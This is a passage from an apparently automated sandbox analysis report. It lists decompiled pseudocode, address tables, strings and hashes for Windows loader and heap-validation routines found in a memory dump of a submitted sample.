				 *((short*)(_t173 - 0x4c)) = _t86;
				 *((short*)(_t173 - 0x4a)) = _t127;
				 *(_t173 - 0x48) = L"LdrpResGetResourceDirectory Exit";
				_t88 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t88 != 0) {
					if( *_t88 == 0) {
						goto L1;
					}
					_t89 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					L2:
					if(( *_t89 & 0x00000001) != 0) {
						_t90 = L328A3C40();
						_t165 = 0x7ffe0384;
						if(_t90 == 0) {
							_t91 = 0x7ffe0384;
						} else {
							_t91 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						L3291FC01(_t173 - 0x44,  *_t91 & 0x000000ff);
					} else {
						_t165 = 0x7ffe0384;
					}
					_t124 =  *(_t173 + 8);
					if(_t124 == 0 ||  *((intOrPtr*)(_t173 + 0x14)) == 0 ||  *((intOrPtr*)(_t173 + 0x18)) == 0) {
						_t93 = 0xc000000d;
						goto L31;
					} else {
						if((_t124 & 0x00000003) != 0) {
							_t117 = _t124 & 0x00000001;
							_t124 = _t124 & 0xfffffffc;
							_t118 = _t117 ^ 0x00000001;
							_t186 = _t118;
							 *(_t173 - 0x24) = _t118;
						}
						 *(_t173 + 0x10) =  *(_t173 + 0x10) & 0x00001000;
						_push(_t173 - 0x28);
						_push(0);
						_push( *((intOrPtr*)(_t173 + 0xc)));
						_push(_t124);
						_t95 = 0;
						_push(_t95 & 0xffffff00 | _t186 == 0x00000000);
						_t93 = E3289E580();
						if(_t93 < 0) {
							L31:
							 *[fs:0x0] =  *((intOrPtr*)(_t173 - 0x10));
							return _t93;
						} else {
							 *(_t173 - 4) =  *(_t173 - 4) & 0x00000000;
							_t146 =  *((intOrPtr*)(_t173 - 0x28));
							_t97 =  *((intOrPtr*)(_t173 - 0x28)) + 0x18;
							_t131 =  *_t97 & 0x0000ffff;
							if(_t131 != 0x10b) {
								if(_t131 != 0x20b) {
									 *(_t173 - 0x1c) = 0xc000007b;
									 *(_t173 - 4) = 0xfffffffe;
									L28:
									_t132 = 0x7ffe0385;
									_t99 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
									if(_t99 != 0) {
										if( *_t99 != 0) {
											_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
										}
									}
									if(( *_t132 & 0x00000001) != 0) {
										if(L328A3C40() != 0) {
											_t165 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
										}
										L3291FC01(_t173 - 0x4c,  *_t165 & 0x000000ff);
									}
									_t93 =  *(_t173 - 0x1c);
									goto L31;
								}
								_push("true");
								_pop(_t135);
								memcpy(_t173 - 0x13c, _t97, _t135 << 2);
								_t137 = 0;
								L12:
								_t105 =  *(_t173 - 0xe0);
								if(_t137 == 0) {
									_t105 =  *(_t173 - 0xd0);
								}
								if(_t105 <= 2) {
									L36:
									 *(_t173 - 0x1c) = 0xc0000089;
									goto L37;
								} else {
									_t169 =  *((intOrPtr*)(_t173 - 0xcc));
									if(_t137 == 0) {
										_t169 =  *((intOrPtr*)(_t173 - 0xbc));
									}
									if(_t169 == 0) {
										goto L36;
									} else {
										if( *(_t173 - 0x24) == 0) {
											if(_t169 <  *((intOrPtr*)(_t173 - 0x100))) {
												goto L17;
											}
											_t160 =  *(_t173 + 0x10);
											_t114 = E328981C2(_t124,  *((intOrPtr*)(_t173 + 0xc)), _t146, 0, _t169, (_t105 & 0xffffff00 | _t160 != 0x00000000) & 0x000000ff);
											if(_t114 == 0) {
												L42:
												 *(_t173 - 0x1c) = 0xc000007b;
												L37:
												 *(_t173 - 4) = 0xfffffffe;
												L27:
												_t165 = 0x7ffe0384;
												goto L28;
											}
											if( *((intOrPtr*)(_t114 + 0x10)) == 0) {
												goto L36;
											}
											_t148 =  *((intOrPtr*)(_t114 + 0x14)) -  *((intOrPtr*)(_t114 + 0xc)) + _t169 + _t124;
											L19:
											 *((intOrPtr*)(_t173 - 0x34)) = _t148;
											 *(_t173 - 4) = 0xfffffffe;
											if(_t148 == 0) {
												 *(_t173 - 0x1c) = 0xc0000089;
												goto L27;
											}
											if(_t160 == 0) {
												L26:
												 *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x14)))) = _t148;
												 *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x18)))) =  *((intOrPtr*)(_t173 - 0x28));
												 *(_t173 - 0x1c) =  *(_t173 - 0x1c) & 0x00000000;
												goto L27;
											}
											if(_t148 <= _t124) {
												L49:
												 *(_t173 - 0x1c) = 0xc000007b;
												goto L27;
											}
											_t171 =  *((intOrPtr*)(_t173 + 0xc)) + (_t124 & 0xfffffffc);
											if(_t148 + 0x10 > _t171) {
												goto L49;
											}
											 *(_t173 - 4) = 1;
											_t109 =  *((intOrPtr*)(_t148 + 0xc));
											 *(_t173 - 0x2c) = _t109;
											_t139 =  *((intOrPtr*)(_t148 + 0xe));
											 *(_t173 - 0x30) = _t139;
											 *(_t173 - 4) = 0xfffffffe;
											if(_t109 != 0 || _t139 != 0) {
												if(_t148 + ((_t139 & 0x0000ffff) + (_t109 & 0x0000ffff)) * 8 > _t171) {
													goto L49;
												}
												goto L26;
											} else {
												 *(_t173 - 0x1c) = 0xc000008a;
												goto L27;
											}
										}
										L17:
										_t148 = _t169 + _t124;
										if(_t148 < _t124) {
											goto L42;
										}
										_t160 =  *(_t173 + 0x10);
										goto L19;
									}
								}
							}
							_push("true");
							_pop(_t143);
							memcpy(_t173 - 0x13c, _t97, _t143 << 2);
							_t137 =  *((intOrPtr*)(_t173 - 0x1d));
							goto L12;
						}
					}
				}
				L1:
				_t89 = 0x7ffe0385;
				goto L2;
			}

0x3289b360
0x3289b365
0x3289b36a
0x3289b36f
0x3289b373
0x3289b379
0x3289b37a
0x3289b37e
0x3289b380
0x3289b381
0x3289b385
0x3289b38c
0x3289b38e
0x3289b38f
0x3289b393
0x3289b397
0x3289b3a4
0x3289b3a9
0x328f353d
0x00000000
0x00000000
0x328f354c
0x3289b3b4
0x3289b3b7
0x328f3556
0x328f355b
0x328f3562
0x328f3574
0x328f3564
0x328f356d
0x328f356d
0x328f357c
0x3289b3bd
0x3289b3bd
0x3289b3bd
0x3289b3c2
0x3289b3c7
0x328f3631
0x00000000
0x3289b3e1
0x3289b3e4
0x3289b3e8
0x3289b3eb
0x3289b3ee
0x3289b3ee
0x3289b3f0
0x3289b3f0
0x3289b3f3
0x3289b3fd
0x3289b3fe
0x3289b400
0x3289b403
0x3289b406
0x3289b40a
0x3289b40b
0x3289b412
0x3289b530
0x3289b533
0x3289b53f
0x3289b418
0x3289b418
0x3289b41c
0x3289b41f
0x3289b422
0x3289b42d
0x3289b59c
0x328f35bd
0x328f35c4
0x3289b50e
0x3289b50e
0x3289b519
0x3289b51e
0x328f35ef
0x328f35fe
0x328f35fe
0x328f35ef
0x3289b527
0x328f3610
0x328f361b
0x328f361b
0x328f3627
0x328f3627
0x3289b52d
0x00000000
0x3289b52d
0x3289b5a2
0x3289b5a4
0x3289b5ad
0x3289b5af
0x3289b443
0x3289b445
0x3289b44b
0x3289b5b6
0x3289b5b6
0x3289b454
0x3289b581
0x3289b581
0x00000000
0x3289b45a
0x3289b45c
0x3289b462
0x3289b5c1
0x3289b5c1
0x3289b46a
0x00000000
0x3289b470
0x3289b474
0x3289b548
0x00000000
0x00000000
0x3289b54e
0x3289b563
0x3289b56a
0x3289b5cc
0x3289b5cc
0x3289b588
0x3289b588
0x3289b509
0x3289b509
0x00000000
0x3289b509
0x3289b570
0x00000000
0x00000000
0x3289b57a
0x3289b488
0x3289b488
0x3289b48b
0x3289b494
0x328f35b1
0x00000000
0x328f35b1
0x3289b49c
0x3289b4f8
0x3289b4fb
0x3289b503
0x3289b505
0x00000000
0x3289b505
0x3289b4a0
0x328f3586
0x328f3586
0x00000000
0x328f3586
0x3289b4ac
0x3289b4b3
0x00000000
0x00000000
0x3289b4b9
0x3289b4c0
0x3289b4c4
0x3289b4c8
0x3289b4cc
0x3289b4d0
0x3289b4da
0x3289b4f2
0x00000000
0x00000000
0x00000000
0x328f3592
0x328f3592
0x00000000
0x328f3592
0x3289b4da
0x3289b47a
0x3289b47a
0x3289b47f
0x00000000
0x00000000
0x3289b485
0x00000000
0x3289b485
0x3289b46a
0x3289b454
0x3289b433
0x3289b435
0x3289b43e
0x3289b440
0x00000000
0x3289b440
0x3289b412
0x3289b3c7
0x3289b3af
0x3289b3af
0x00000000

Strings

LdrpResGetResourceDirectory Enter, xrefs: 3289B385
LdrpResGetResourceDirectory Exit, xrefs: 3289B397
{, xrefs: 328F35BD

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: 6ad5a388b93104185160fe6d25763d40ce67cb3023c634912bd9d692873fdc40
Instruction ID: 7072865822952b19a78e531327aea5bf60c318e601d9470dc03d0ca6809acb7c
Opcode Fuzzy Hash: 6ad5a388b93104185160fe6d25763d40ce67cb3023c634912bd9d692873fdc40
Instruction Fuzzy Hash: 0891DD79A04349DFEB11CF58D8407EEB7B0EF45368F148199E819AB290DB79DA80CB90

Uniqueness

Uniqueness Score: -1.00%

Function 3296B2BC Relevance: 3.9, Strings: 3, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E3296B2BC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				char _v532;
				signed int* _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v546;
				signed int _v548;
				signed int _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				char _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				signed int* _v588;
				intOrPtr _v592;
				char _v596;
				char _v600;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t66;
				void* _t70;
				void* _t73;
				void* _t82;
				void* _t86;
				void* _t89;
				intOrPtr* _t101;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;

				_t111 = __edx;
				_v8 =  *0x3298b370 ^ _t115;
				_v556 = _a4;
				_t112 = 0;
				_v540 = _v540 & 0;
				_v536 = _a8;
				_v560 = __ecx;
				_t101 = L328A5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", "true");
				if(_t101 == 0) {
					_t113 = 0xc0000017;
					L4:
					if(_t113 < 0) {
						L25:
						if(_t101 != 0) {
							E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t101);
						}
						return E328D4B50(_t113, _t101, _v8 ^ _t115, _t111, _t112, _t113);
					} else {
						_t66 =  *((intOrPtr*)(_t112 + 1));
						if(_t66 < 2 || _t66 == 5 &&  *((intOrPtr*)(_t112 + 8)) == 0x15 &&  *((intOrPtr*)(_t112 + 0x18)) == 0x1f7) {
							_t113 = 0xc0000136;
							_v540 = 1;
							 *_v536 =  *_v536 & 0x00000000;
						}
						_t124 = _t113;
						if(_t113 >= 0) {
							_t70 = E328B39C0(_t101, _t113, _t124,  &_v572, _t112, 1);
							_t113 = _t70;
							if(_t70 >= 0) {
								_v552 = _v552 & 0x00000000;
								_t73 = E328C5BE0(L"GlobalizationUserSettings", L"TargetNtPath", L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\International", 0,  &_v532, 0x208,  &_v552);
								_t113 = _t73;
								if(_t73 >= 0) {
									_t107 = _v552 + 4;
									_t114 = _v572 + _v552 + 0x00000004 & 0x0000ffff;
									_t112 = L328A5D90(_v552 + 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _t114);
									if(_t112 == 0) {
										_t113 = 0xc0000017;
									} else {
										_v548 = _v548 & 0x00000000;
										_v546 = _t114;
										_v544 = _t112;
										_t82 = E3289FE40(_t107,  &_v548,  &_v532);
										_t113 = _t82;
										if(_t82 >= 0) {
											_t86 = E3289FE40(_t107,  &_v548, "\\");
											_t113 = _t86;
											if(_t86 >= 0) {
												_t89 = E328B10D0(_t107,  &_v548,  &_v572);
												_t113 = _t89;
												if(_t89 >= 0) {
													_v596 = 0x18;
													_v588 =  &_v548;
													_v592 = 0;
													_push( &_v596);
													_push(0x20019);
													_v584 = 0x240;
													_push( &_v564);
													_v580 = 0;
													_v576 = 0;
													if( *0x3286733c() < 0) {
														__eflags = 1;
														_v540 = 1;
														 *_v536 = 1;
													} else {
														 *0x32867340(_v564);
														 *_v536 = 2;
														_t113 =  *0x3286733c(_v556, _v560,  &_v596);
													}
												}
											}
										}
										E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t112);
									}
								}
								E328A3B90( &_v572);
							}
						}
						if(_v540 != 0) {
							_t111 = _v556;
							_t113 = E3296B55F(_v560, _v556);
						}
						goto L25;
					}
				}
				_t113 =  *0x32867348(0xfffffffa, 1, _t101, "true",  &_v600);
				if(_t113 < 0) {
					goto L25;
				} else {
					_t112 =  *_t101;
					goto L4;
				}
			}

0x3296b2bc
0x3296b2ce
0x3296b2d7
0x3296b2dd
0x3296b2e2
0x3296b2e8
0x3296b2f8
0x3296b306
0x3296b30a
0x3296b32e
0x3296b333
0x3296b335
0x3296b537
0x3296b539
0x3296b547
0x3296b547
0x3296b55c
0x3296b33b
0x3296b33b
0x3296b340
0x3296b35b
0x3296b360
0x3296b36a
0x3296b36a
0x3296b36d
0x3296b36f
0x3296b37f
0x3296b384
0x3296b388
0x3296b38e
0x3296b3b9
0x3296b3be
0x3296b3c2
0x3296b3d4
0x3296b3d9
0x3296b3ed
0x3296b3f1
0x3296b50a
0x3296b3f7
0x3296b3f7
0x3296b40b
0x3296b413
0x3296b419
0x3296b41e
0x3296b422
0x3296b434
0x3296b439
0x3296b43d
0x3296b451
0x3296b456
0x3296b45a
0x3296b466
0x3296b470
0x3296b47e
0x3296b484
0x3296b485
0x3296b490
0x3296b49a
0x3296b49b
0x3296b4a1
0x3296b4af
0x3296b4ee
0x3296b4ef
0x3296b4f5
0x3296b4b1
0x3296b4b7
0x3296b4c3
0x3296b4e2
0x3296b4e2
0x3296b4af
0x3296b45a
0x3296b43d
0x3296b503
0x3296b503
0x3296b3f1
0x3296b516
0x3296b516
0x3296b388
0x3296b522
0x3296b524
0x3296b535
0x3296b535
0x00000000
0x3296b522
0x3296b335
0x3296b320
0x3296b324
0x00000000
0x3296b32a
0x3296b32a
0x00000000
0x3296b32a

Strings

TargetNtPath, xrefs: 3296B3AF
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3296B3AA
GlobalizationUserSettings, xrefs: 3296B3B4

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: d8220a1ebd806ba98ae44b9573c8ebeff41013006f905b87564ce5f1e7a0b7a0
Instruction ID: 946cfa90344982c317f38d433242cb4ddcd7fc2bfbb4012239ff78bbab4e3351
Opcode Fuzzy Hash: d8220a1ebd806ba98ae44b9573c8ebeff41013006f905b87564ce5f1e7a0b7a0
Instruction Fuzzy Hash: A461A076D41228ABDB20DF54DC98BE9B7F8AB14724F4101E5EA08BB250DB74DE84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 3288F75B Relevance: 3.9, Strings: 3, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E3288F75B(void* __ecx, signed short* __edx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				signed char _t63;
				signed int _t67;
				void* _t71;
				intOrPtr _t72;
				void* _t79;
				signed char* _t82;
				intOrPtr _t83;
				signed char* _t88;
				intOrPtr _t89;
				void* _t90;
				signed char* _t93;
				void* _t126;
				signed int* _t127;

				_t127 = __edx;
				_t126 = __ecx;
				_t58 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t31 =  &(_t127[4]); // 0xddeeddfe
					E328E8140(_t31, _t58 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t63 =  *(_t126 + 0xcc) ^  *0x32986d48;
				if(_t63 == 0) {
					_t63 = E3288F858(_t127,  &_v12,  &_v8);
					if(_t63 != 0) {
						_t71 = E3288FABA( &_v12,  &_v8, 0x4000);
						_t109 = _t71;
						if(_t71 < 0) {
							_t72 =  *[fs:0x30];
							__eflags =  *(_t72 + 0xc);
							if( *(_t72 + 0xc) == 0) {
								_push("HEAP: ");
								E3288B910();
							} else {
								E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t126);
							_t63 = E3288B910("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t109);
						} else {
							_t79 = L328A3C40();
							_t110 = 0x7ffe0380;
							if(_t79 != 0) {
								_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t82 = 0x7ffe0380;
							}
							if( *_t82 != 0) {
								_t83 =  *[fs:0x30];
								__eflags =  *(_t83 + 0x240) & 0x00000001;
								if(( *(_t83 + 0x240) & 0x00000001) != 0) {
									E3294F13E(_t110, _t126, _v12, _v8, 7);
								}
							}
							 *((intOrPtr*)(_t126 + 0x220)) =  *((intOrPtr*)(_t126 + 0x220)) + 1;
							 *((intOrPtr*)(_t126 + 0x240)) =  *((intOrPtr*)(_t126 + 0x240)) + 1;
							 *((intOrPtr*)(_t126 + 0x244)) =  *((intOrPtr*)(_t126 + 0x244)) + _v8;
							 *((intOrPtr*)(_t126 + 0x230)) =  *((intOrPtr*)(_t126 + 0x230)) + 1;
							if(L328A3C40() != 0) {
								_t88 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t88 = _t110;
							}
							if( *_t88 != 0) {
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0x240) & 0x00000001;
								if(( *(_t89 + 0x240) & 0x00000001) != 0) {
									__eflags = L328A3C40();
									if(__eflags != 0) {
										_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E3294F058(_t110, _t126, _v12, __eflags, _v8,  *(_t126 + 0x74) << 3, 0, 0,  *_t110 & 0x000000ff);
								}
							}
							_t90 = L328A3C40();
							_t111 = 0x7ffe038a;
							if(_t90 != 0) {
								_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t93 = 0x7ffe038a;
							}
							if( *_t93 != 0) {
								__eflags = L328A3C40();
								if(__eflags != 0) {
									_t111 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								}
								E3294F058(_t111, _t126, _v12, __eflags, _v8,  *(_t126 + 0x74) << 3, 0, 0,  *_t111 & 0x000000ff);
							}
							_t63 = _t127[0] & 0x00000013 | 0x00000008;
							_t127[0] = _t63;
						}
					}
				}
				if( *((intOrPtr*)(_t126 + 0x4c)) != 0) {
					_t127[0] = _t127[0] ^ _t127[0] ^  *_t127;
					_t67 =  *(_t126 + 0x50);
					 *_t127 =  *_t127 ^ _t67;
					return _t67;
				}
				return _t63;
			}

0x3288f765
0x3288f768
0x3288f76a
0x3288f76d
0x3288f771
0x3288f779
0x3288f77c
0x328ee322
0x328ee326
0x328ee32b
0x328ee32b
0x3288f788
0x3288f78e
0x3288f79e
0x3288f7a5
0x3288f7b7
0x3288f7bc
0x3288f7c0
0x328ee419
0x328ee41f
0x328ee423
0x328ee442
0x328ee447
0x328ee425
0x328ee43a
0x328ee43f
0x328ee44d
0x328ee450
0x328ee453
0x328ee45a
0x3288f7c6
0x3288f7c6
0x3288f7cb
0x3288f7d2
0x328ee33d
0x3288f7d8
0x3288f7d8
0x3288f7d8
0x3288f7dd
0x328ee347
0x328ee34d
0x328ee354
0x328ee364
0x328ee364
0x328ee354
0x3288f7e3
0x3288f7ec
0x3288f7f2
0x3288f7f8
0x3288f805
0x328ee377
0x3288f80b
0x3288f80b
0x3288f80b
0x3288f810
0x328ee381
0x328ee387
0x328ee38e
0x328ee399
0x328ee39b
0x328ee3a6
0x328ee3a6
0x328ee3a6
0x328ee3c3
0x328ee3c3
0x328ee38e
0x3288f816
0x3288f81b
0x3288f822
0x328ee3d6
0x3288f828
0x3288f828
0x3288f828
0x3288f82d
0x328ee3e5
0x328ee3e7
0x328ee3f2
0x328ee3f2
0x328ee3f2
0x328ee40f
0x328ee40f
0x3288f838
0x3288f83a
0x3288f83a
0x3288f7c0
0x3288f7a5
0x3288f841
0x3288f84b
0x3288f84e
0x3288f851
0x00000000
0x3288f851
0x3288f857

Strings

HEAP[%wZ]: , xrefs: 328EE435
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 328EE455
HEAP: , xrefs: 328EE442

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: a8b1d17d5f43a460c725fd658d4aeb5ac6c04f3778e32deed081df69d273c2a7
Instruction ID: 45a8484f3a714ec2cf53bce74a78fc09b8af244d3f80e8c5713354959d5e725d
Opcode Fuzzy Hash: a8b1d17d5f43a460c725fd658d4aeb5ac6c04f3778e32deed081df69d273c2a7
Instruction Fuzzy Hash: 4E51223D600784AFF316CBA8C884F9ABBF8FF05754F4440A4E9658B692DB74E940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 3293D62C Relevance: 3.9, Strings: 3, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E3293D62C(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed int _t52;
				intOrPtr _t53;
				signed int _t63;
				signed short _t64;
				intOrPtr _t67;
				signed short _t71;
				signed int _t74;
				signed short _t75;
				signed short _t77;
				void* _t81;
				signed int _t82;
				signed int _t83;
				signed char _t92;
				unsigned int _t97;
				unsigned int _t102;
				signed int _t106;
				void* _t108;
				void* _t109;
				unsigned int _t112;

				_t82 = __ecx;
				_push(__ecx);
				_t112 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t71 =  *__edx;
							if(( *(__ecx + 0x4c) & _t71) != 0) {
								_t71 = _t71 ^  *(__ecx + 0x50);
							}
							_t44 = _t71 & 0x0000ffff;
						}
					} else {
						_t102 = __edx >> 0x00000003 ^  *__edx ^  *0x32986964 ^ __ecx;
						if(_t102 == 0) {
							_t74 =  *((intOrPtr*)(__edx - (_t102 >> 0xd)));
						} else {
							_t74 = 0;
						}
						_t44 =  *((intOrPtr*)(_t74 + 0x14));
					}
					_t92 =  *((intOrPtr*)(_t112 + 7));
					_t106 = _t44 & 0xffff;
					if(_t92 != 5) {
						if((_t92 & 0x00000040) == 0) {
							if((_t92 & 0x0000003f) == 0x3f) {
								if(_t92 >= 0) {
									if( *(_t82 + 0x4c) == 0) {
										_t48 =  *_t112 & 0x0000ffff;
									} else {
										_t64 =  *_t112;
										if(( *(_t82 + 0x4c) & _t64) != 0) {
											_t64 = _t64 ^  *(_t82 + 0x50);
										}
										_t48 = _t64 & 0x0000ffff;
									}
								} else {
									_t97 = _t112 >> 0x00000003 ^  *_t112 ^  *0x32986964 ^ _t82;
									if(_t97 == 0) {
										_t67 =  *((intOrPtr*)(_t112 - (_t97 >> 0xd)));
									} else {
										_t67 = 0;
									}
									_t48 =  *((intOrPtr*)(_t67 + 0x14));
								}
								_t83 =  *(_t112 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t83 = _t92 & 0x3f;
							}
						} else {
							_t83 =  *(_t112 + 4 + (_t92 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t83 =  *(_t82 + 0x54) & 0x0000ffff ^  *(_t112 + 4) & 0x0000ffff;
					}
					_t108 = (_t106 << 3) - _t83;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t75 =  *__edx & 0x0000ffff;
					} else {
						_t77 =  *__edx;
						if(( *(__ecx + 0x4c) & _t77) != 0) {
							_t77 = _t77 ^  *(__ecx + 0x50);
						}
						_t75 = _t77 & 0x0000ffff;
					}
					_t108 =  *((intOrPtr*)(_t112 - 8)) - (_t75 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t112 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t63 = _t51 & 0x3f;
					goto L38;
				} else {
					_t63 =  *(_t112 + 6) & 0x000000ff;
					L38:
					_t52 = _t63 << 3;
					L42:
					_t109 = _t108 + _t52;
					_t35 = _t112 + 8; // -16
					_t81 = _t35 + _t109;
					_t53 = E328E8050(_t81, 0x328672b8, "true");
					_v8 = _t53;
					if(_t53 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E3288B910();
					} else {
						E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t109);
					_push(_v8 + _t81);
					E3288B910("Heap block at %p modified at %p past requested size of %Ix\n", _t112);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x329847a1 = 1;
						asm("int3");
						 *0x329847a1 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x3293d62c
0x3293d631
0x3293d634
0x3293d637
0x3293d63c
0x3293d7de
0x3293d7de
0x3293d7e0
0x3293d7e4
0x3293d7e4
0x3293d644
0x3293d66d
0x3293d698
0x3293d6a9
0x3293d69a
0x3293d69a
0x3293d69f
0x3293d6a1
0x3293d6a1
0x3293d6a4
0x3293d6a4
0x3293d66f
0x3293d67a
0x3293d67f
0x3293d68c
0x3293d681
0x3293d681
0x3293d681
0x3293d68e
0x3293d68e
0x3293d6ac
0x3293d6b2
0x3293d6b8
0x3293d6c9
0x3293d6de
0x3293d6ea
0x3293d717
0x3293d728
0x3293d719
0x3293d719
0x3293d71e
0x3293d720
0x3293d720
0x3293d723
0x3293d723
0x3293d6ec
0x3293d6f9
0x3293d6fe
0x3293d70b
0x3293d700
0x3293d700
0x3293d700
0x3293d70d
0x3293d70d
0x3293d731
0x3293d6e0
0x3293d6e3
0x3293d6e3
0x3293d6cb
0x3293d6d1
0x3293d6d1
0x3293d6ba
0x3293d6c2
0x3293d6c2
0x3293d738
0x3293d646
0x3293d64a
0x3293d65b
0x3293d64c
0x3293d64c
0x3293d651
0x3293d653
0x3293d653
0x3293d656
0x3293d656
0x3293d664
0x3293d664
0x3293d73a
0x3293d73f
0x3293d74c
0x3293d756
0x00000000
0x3293d756
0x3293d751
0x00000000
0x3293d741
0x3293d741
0x3293d745
0x3293d745
0x3293d758
0x3293d75a
0x3293d75c
0x3293d764
0x3293d767
0x3293d76c
0x3293d772
0x00000000
0x00000000
0x3293d77f
0x3293d79f
0x3293d7a4
0x3293d781
0x3293d797
0x3293d79c
0x3293d7ad
0x3293d7b0
0x3293d7b7
0x3293d7c9
0x3293d7cb
0x3293d7d2
0x3293d7d3
0x3293d7d3
0x3293d7da
0x00000000
0x3293d7da

Strings

HEAP[%wZ]: , xrefs: 3293D792
Heap block at %p modified at %p past requested size of %Ix, xrefs: 3293D7B2
HEAP: , xrefs: 3293D79F

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
